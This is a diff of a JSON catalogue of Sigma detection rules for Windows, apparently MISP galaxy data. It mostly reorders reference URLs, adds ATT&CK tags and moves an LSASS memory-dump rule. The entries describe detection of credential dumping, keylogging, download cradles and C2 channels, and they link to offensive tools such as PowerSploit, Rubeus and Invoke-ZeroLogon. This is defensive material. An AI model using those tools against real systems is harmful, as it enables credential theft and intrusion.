  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
  "https://github.com/harleyQu1nn/AggressorScripts",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml"
  ],
  "tags": [
@@ -32406,10 +32795,10 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462",
  "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7",
  "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1",
  "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1",
+ "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml"
  ],
  "tags": [
@@ -32475,9 +32864,9 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
- "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
  "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
+ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml"
  ],
  "tags": [
@@ -32810,8 +33199,8 @@
  "logsource.product": "windows",
  "refs": [
  "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content",
- "https://twitter.com/ScumBots/status/1610626724257046529",
  "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0",
+ "https://twitter.com/ScumBots/status/1610626724257046529",
  "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml"
  ],
@@ -32846,8 +33235,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7",
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml"
  ],
  "tags": [
@@ -32950,8 +33339,20 @@
  "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml"
  ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
  },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
  "uuid": "3c7d1587-3b13-439f-9941-7d14313dbdfe",
  "value": "Potential COM Objects Download Cradles Usage - PS Script"
  },
@@ -33009,24 +33410,24 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
  "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://adsecurity.org/?p=2921",
  "https://github.com/Kevin-Robertson/Powermad",
  "https://github.com/adrecon/AzureADRecon",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/adrecon/ADRecon",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
  "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
  "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
  "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
  "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml"
  ],
  "tags": [
@@ -33201,9 +33602,9 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
- "https://github.com/GhostPack/Rubeus",
  "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus",
+ "https://github.com/GhostPack/Rubeus",
+ "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml"
  ],
  "tags": [
@@ -33360,13 +33761,25 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
  "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
+ "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
  "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml"
  ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1553.004"
+ ]
  },
+ "related": [
+ {
+ "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
  "uuid": "504d63cb-0dba-4d02-8531-e72981aace2c",
  "value": "Suspicious X509Enrollment - Ps Script"
  },
@@ -33524,8 +33937,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/Arno0x/DNSExfiltrator",
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh",
+ "https://github.com/Arno0x/DNSExfiltrator",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml"
  ],
  "tags": [
@@ -33625,8 +34038,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
  "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml"
  ],
  "tags": [
@@ -33759,8 +34172,8 @@
  "logsource.category": "ps_script",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
  "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml"
  ],
  "tags": [
@@ -33967,8 +34380,8 @@
  "logsource.product": "windows",
  "refs": [
  "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2",
  "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml"
  ],
  "tags": [
@@ -34200,9 +34613,9 @@
  "logsource.category": "create_remote_thread",
  "logsource.product": "windows",
  "refs": [
+ "https://github.com/denandz/KeeFarce",
  "https://github.com/GhostPack/KeeThief",
  "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a",
- "https://github.com/denandz/KeeFarce",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml"
  ],
  "tags": [
@@ -34268,8 +34681,8 @@
  "logsource.category": "create_remote_thread",
  "logsource.product": "windows",
  "refs": [
- "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
  "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f",
+ "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml"
  ],
  "tags": [
@@ -34636,11 +35049,11 @@
  "logsource.category": "driver_load",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/fengjixuchui/gdrv-loader",
- "https://twitter.com/malmoeb/status/1551449425842786306",
  "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details",
- "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
+ "https://twitter.com/malmoeb/status/1551449425842786306",
  "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details",
+ "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b",
+ "https://github.com/fengjixuchui/gdrv-loader",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml"
  ],
  "tags": [
@@ -34706,8 +35119,8 @@
  "logsource.category": "driver_load",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/winsiderss/systeminformer",
  "https://systeminformer.sourceforge.io/",
+ "https://github.com/winsiderss/systeminformer",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_pua_system_informer.yml"
  ],
  "tags": [
@@ -34815,8 +35228,8 @@
  "logsource.category": "driver_load",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0",
  "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/",
+ "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml"
  ],
  "tags": [
@@ -35349,8 +35762,8 @@
  "logsource.product": "windows",
  "refs": [
  "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
- "https://content.fireeye.com/apt-41/rpt-apt41",
  "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html",
+ "https://content.fireeye.com/apt-41/rpt-apt41",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml"
  ],
  "tags": [
@@ -35676,8 +36089,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling",
  "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
+ "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml"
  ],
  "tags": [
@@ -35790,11 +36203,11 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://twitter.com/M_haggis/status/900741347035889665",
  "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
+ "https://twitter.com/M_haggis/status/1032799638213066752",
  "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
  "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1",
- "https://twitter.com/M_haggis/status/1032799638213066752",
+ "https://twitter.com/M_haggis/status/900741347035889665",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml"
  ],
  "tags": [
@@ -36053,11 +36466,11 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf",
- "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/",
- "https://youtu.be/n2dFlSaBBKo",
  "https://github.com/looCiprian/GC2-sheet",
+ "https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/",
  "https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/",
+ "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf",
+ "https://youtu.be/n2dFlSaBBKo",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_google_api_non_browser_access.yml"
  ],
  "tags": [
@@ -36308,8 +36721,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://twitter.com/kleiton0x7e/status/1600567316810551296",
  "https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al",
+ "https://twitter.com/kleiton0x7e/status/1600567316810551296",
  "https://github.com/kleiton0x00/RedditC2",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_reddit_api_non_browser_access.yml"
  ],
@@ -36343,8 +36756,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/mttaggart/OffensiveNotion",
  "https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332",
+ "https://github.com/mttaggart/OffensiveNotion",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notion_api_susp_communication.yml"
  ],
  "tags": [
@@ -36377,8 +36790,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download",
  "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml"
  ],
  "tags": [
@@ -36411,8 +36824,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08",
  "https://redcanary.com/blog/child-processes/",
+ "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml"
  ],
  "tags": [
@@ -36521,10 +36934,10 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
  "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a",
- "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html",
  "https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md",
+ "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml"
  ],
  "tags": [
@@ -36557,12 +36970,24 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb",
  "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east",
+ "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml"
  ],
- "tags": "No established tags"
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
  },
+ "related": [
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
  "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68",
  "value": "Suspicious Dropbox API Usage"
  },
@@ -36579,8 +37004,8 @@
  "logsource.category": "network_connection",
  "logsource.product": "windows",
  "refs": [
- "https://www.mandiant.com/resources/russian-targeting-gov-business",
  "https://megatools.megous.com/",
+ "https://www.mandiant.com/resources/russian-targeting-gov-business",
  "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml"
  ],
  "tags": [
@@ -36660,6 +37085,44 @@
 "uuid": "07a99744-56ac-40d2-97b7-2095967b0e03",
 "value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique"
 },
+ {
+ "description": "Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2021/11/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_lsass_default_dump_file_names.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/CCob/MirrorDump",
+ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
+ "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf",
+ "https://github.com/helpsystems/nanodump",
+ "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml",
+ "https://www.google.com/search?q=procdump+lsass",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391",
+ "value": "LSASS Process Memory Dump Files"
+ },
 {
 "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n",
 "meta": {
@@ -36673,9 +37136,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
 "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml"
 ],
 "tags": [
@@ -36732,8 +37195,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://adsecurity.org/?p=2398",
 "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/",
+ "https://adsecurity.org/?p=2398",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml"
 ],
 "tags": [
@@ -36774,10 +37237,10 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/cube0x0/status/1418920190759378944",
- "https://github.com/WiredPulse/Invoke-HiveNightmare",
 "https://github.com/FireFart/hivenightmare/",
+ "https://github.com/WiredPulse/Invoke-HiveNightmare",
 "https://github.com/GossiTheDog/HiveNightmare",
+ "https://twitter.com/cube0x0/status/1418920190759378944",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml"
 ],
 "tags": [
@@ -36811,8 +37274,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3",
 "Internal Research",
+ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_creation.yml"
 ],
 "tags": [
@@ -36835,9 +37298,9 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
- "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
 "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
+ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
+ "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml"
 ],
 "tags": [
@@ -36887,11 +37350,11 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/luc4m/status/1073181154126254080",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
 "https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://twitter.com/luc4m/status/1073181154126254080",
 "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml"
 ],
 "tags": [
@@ -36957,8 +37420,8 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
 "https://twitter.com/0gtweet/status/1465282548494487554",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml"
 ],
 "tags": [
@@ -37058,44 +37521,6 @@
 "uuid": "3da70954-0f2c-4103-adff-b7440368f50e",
 "value": "Suspicious PROCEXP152.sys File Created In TMP"
 },
- {
- "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/11/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_lsass_dump.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/CCob/MirrorDump",
- "https://github.com/helpsystems/nanodump",
- "https://www.google.com/search?q=procdump+lsass",
- "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml",
- "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
- "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391",
- "value": "LSASS Process Memory Dump Files"
- },
 {
 "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n",
 "meta": {
@@ -37168,12 +37593,12 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
 "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/",
- "https://labs.withsecure.com/publications/detecting-onenote-abuse",
- "https://twitter.com/MaD_c4t/status/1623414582382567424",
 "https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/",
+ "https://labs.withsecure.com/publications/detecting-onenote-abuse",
+ "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
 "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/",
+ "https://twitter.com/MaD_c4t/status/1623414582382567424",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml"
 ],
 "tags": [
@@ -37196,10 +37621,10 @@
 "logsource.category": "file_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
 "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://pentestlab.blog/tag/ntds-dit/",
